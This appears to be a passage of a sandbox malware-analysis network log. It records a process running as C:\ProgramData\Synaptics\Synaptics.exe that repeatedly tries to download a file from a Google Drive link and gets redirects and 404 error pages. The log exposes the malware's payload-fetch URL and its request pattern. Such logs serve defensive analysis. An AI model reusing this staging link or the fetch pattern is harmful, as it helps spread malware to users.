                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:36 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                            2024-12-30 10:49:36 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 33 39 71 61 54 5a 73 34 74 56 7a 43 4e 55 44 6c 73 49 4a 66 6d 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="39qaTZs4tVzCNUDlsIJfmQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                            2024-12-30 10:49:36 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            91192.168.2.849853142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:36 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:36 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:36 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-YVPLeg4Icw5weZP6m3K3xg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            92192.168.2.849855142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:36 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:36 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:36 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-2I55lOdXTuFfbVw7Anj0mg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            93192.168.2.849858142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:37 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:37 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC66P3HpfYHCFpNAm2ol3204aHvW-CKGNGo-232F3Pk5VHVL5GIkEyrBQZGTTc9_0Wu7
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:37 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-6JzYFZ4z3BlnIkEz-L5xVQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:37 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                            2024-12-30 10:49:37 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 34 6b 36 64 37 39 4e 61 66 76 47 5f 31 33 4e 54 4d 74 5a 66 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                            Data Ascii: t Found)!!1</title><style nonce="U4k6d79NafvG_13NTMtZfg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                            2024-12-30 10:49:37 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            94192.168.2.849859142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:37 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:37 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:37 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-sSuWMkEzBibl7lkG7xihpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            95192.168.2.849861142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:37 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:37 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:37 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-5LQNx_lEAbaNmmJnrHnPyQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            96192.168.2.849860142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:37 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:38 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC6OvPLq_49AU8X_zbQTgnhpkWfKv5xq2n6pn-TiMn2cpRAuyWF9I0Gah7OzSjBnNc8SIYyDoKg
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:38 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-_iB_8PufKkFaGkso8o2S-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:38 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                            2024-12-30 10:49:38 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 42 76 45 38 49 65 42 78 46 55 4e 6c 4e 69 56 66 46 44 41 55 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="NBvE8IeBxFUNlNiVfFDAUA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                            2024-12-30 10:49:38 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            97192.168.2.849862142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:38 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:38 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:38 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-wGZAZ2DmgVW-65ostKmNqw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
